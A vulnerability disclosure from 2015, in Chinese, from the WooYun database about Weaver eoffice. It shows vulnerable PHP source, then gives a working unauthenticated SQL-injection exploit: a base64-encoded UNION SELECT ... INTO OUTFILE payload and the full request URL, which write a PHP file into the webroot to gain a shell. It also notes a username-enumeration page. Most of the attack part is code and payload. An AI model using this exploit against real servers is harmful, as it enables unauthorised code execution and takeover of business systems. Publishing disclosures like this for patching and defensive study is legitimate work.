泛微eoffice前台getshell+一处小问题(无需登录)

发表于 2015年07月23日
WooYun漏洞库
90 阅读

漏洞概要

缺陷编号：WooYun-2015-0128007

漏洞标题：泛微eoffice前台getshell+一处小问题(无需登录)

漏洞详情

披露状态：

2015-07-23: 细节已通知厂商并且等待厂商处理中
2015-07-24: 厂商已经确认，细节仅向厂商公开
2015-07-27: 细节向第三方安全合作伙伴开放（绿盟科技、唐朝安全巡航、无声信息）
2015-09-17: 细节向核心白帽子及相关领域专家公开
2015-09-27: 细节向普通白帽子公开
2015-10-07: 细节向实习白帽子公开
2015-10-22: 细节向公众公开

简要描述：

详细说明：

看到inc/group_user_list/group_xml.php

session_start( );<br>
include_once( "inc/conn.php" );<br>
include_once( "inc/xtree_xml.inc.php" );<br>
include_once( "inc/utility_all.php" );<br>
header( "Expires: Mon, 26 Jul 1997 05:00:00 GMT" );<br>
header( "Cache-Control: no-cache, must-revalidate" );<br>
header( "Pragma: no-cache" );<br>
header( "Content-Type: text/xml" );<br>
$pararr = explodestpar( $_REQUEST['par'] );<br>
$groupid = $pararr['groupid'];<br>
if ( $groupid == "" )<br>
{<br>
				exit( );<br>
}<br>
$groupurl_fix = "?";<br>
$userurl_fix = "?";<br>
if ( 0 < strpos( $pararr['group_url'], "?" ) )<br>
{<br>
				$groupurl_fix = "&";<br>
}<br>
if ( 0 < strpos( $pararr['user_url'], "?" ) )<br>
{<br>
				$userurl_fix = "&";<br>
}<br>
$xtreeXml = new xtreeXml( );<br>
$xtreeXml->initXml( );<br>
if ( $pararr['group'] == 1 )<br>
{<br>
				$sql = "SELECT * FROM pub_group WHERE GROUP";<br>
}<br>
else<br>
{<br>
				$sql = "SELECT * FROM USER,USER_GROUP WHERE USER_GROUP.GROUP";<br>
}<br>
$rs = exequery( $connection, $sql );<br>
$row = mysql_fetch_array( $rs );<br>
$groupmember = $row['GROUP_MEMBER'];

session_start( );

include_once( "inc/conn.php" );

include_once( "inc/xtree_xml.inc.php" );

include_once( "inc/utility_all.php" );

header( "Expires: Mon, 26 Jul 1997 05:00:00 GMT" );

header( "Cache-Control: no-cache, must-revalidate" );

header( "Pragma: no-cache" );

header( "Content-Type: text/xml" );

$pararr = explodestpar( $_REQUEST['par'] );

$groupid = $pararr['groupid'];

if ( $groupid == "" )

{

exit( );

}

$groupurl_fix = "?";

$userurl_fix = "?";

if ( 0 < strpos( $pararr['group_url'], "?" ) )

{

$groupurl_fix = "&";

}

if ( 0 < strpos( $pararr['user_url'], "?" ) )

{

$userurl_fix = "&";

}

$xtreeXml = new xtreeXml( );

$xtreeXml->initXml( );

if ( $pararr['group'] == 1 )

{

$sql = "SELECT * FROM pub_group WHERE GROUP";

}

else

{

$sql = "SELECT * FROM USER,USER_GROUP WHERE USER_GROUP.GROUP";

}

$rs = exequery( $connection, $sql );

$row = mysql_fetch_array( $rs );

$groupmember = $row['GROUP_MEMBER'];

$groupid没有被双引号包裹，然后造成注入。然后$groupid来自于$pararr['groupid'];其中经过了$explodestpar这个函数

function explodeStPar( $enpar ){$depar = base64_decode( $enpar );$arrpar = explode( "|", $depar );if ( !is_array( $arrpar ) ){return false;}$i = 0;for ( ;	$i < sizeof( $arrpar );	++$i	){$strpar = $arrpar[$i];$tmparr = explode( ":", $strpar );$j = 0;for ( ;	$j < sizeof( $tmparr );	++$j	){if ( $j == 0 ){preg_match( "/\\[([a-z0-9-_].+)\\]/i", $tmparr[$j], $exp );$par = $exp[1];}else{preg_match( "/\\[(.*)\\]/i", $tmparr[$j], $exp );$val = $exp[1];}}if ( trim( $par ) != "" ){$rearr[$par] = $val;}}return $rearr;}

在这里经过了base64_decode 所以不受GPC影响，而且泛微安装完成之后mysql是root，可以直接写文件。这样就可以完美的getshell了。首先我们要构造如何的数据

[group]:[1]|[groupid]:[1']

1	[group]:[1]\|[groupid]:[1']

然后base64_encode一下。

W2dyb3VwXTpbMV18W2dyb3VwaWRdOlsxJ10=

1	W2dyb3VwXTpbMV18W2dyb3VwaWRdOlsxJ10=

可以看到php报错了。然后我们构造写shell的语句。要注意的是sql语句里面不能含有:号。然后我们构造如下exp

[group]:[1]|[groupid]:[1 union select '<?php phpinfo()?>',2,3,4,5,6,7,8 into outfile '../webroot/axxxxxxxx.php']

1	[group]:[1]\|[groupid]:[1 union select '<?php phpinfo()?>',2,3,4,5,6,7,8 into outfile '../webroot/axxxxxxxx.php']

base64一下

W2dyb3VwXTpbMV18W2dyb3VwaWRdOlsxIHVuaW9uIHNlbGVjdCAnPD9waHAgcGhwaW5mbygpPz4nLDIsMyw0LDUsNiw3LDggaW50byBvdXRmaWxlICcuLi93ZWJyb290L2F4eHh4eHh4eC5waHAnXQ==

1	W2dyb3VwXTpbMV18W2dyb3VwaWRdOlsxIHVuaW9uIHNlbGVjdCAnPD9waHAgcGhwaW5mbygpPz4nLDIsMyw0LDUsNiw3LDggaW50byBvdXRmaWxlICcuLi93ZWJyb290L2F4eHh4eHh4eC5waHAnXQ==

小问题可以遍历所有用户名

http://**.**.**.**:8028/UserSelect/main.php#

1	http://...:8028/UserSelect/main.php#

漏洞证明：

然后访问

http://**.**.**.**:8028/inc/group_user_list/group_xml.php?par=W2dyb3VwXTpbMV18W2dyb3VwaWRdOlsxIHVuaW9uIHNlbGVjdCAnPD9waHAgcGhwaW5mbygpPz4nLDIsMyw0LDUsNiw3LDggaW50byBvdXRmaWxlICcuLi93ZWJyb290L2F4eHh4eHh4eC5waHAnXQ==

1	http://...:8028/inc/group_user_list/group_xml.php?par=W2dyb3VwXTpbMV18W2dyb3VwaWRdOlsxIHVuaW9uIHNlbGVjdCAnPD9waHAgcGhwaW5mbygpPz4nLDIsMyw0LDUsNiw3LDggaW50byBvdXRmaWxlICcuLi93ZWJyb290L2F4eHh4eHh4eC5waHAnXQ==

成功生成shell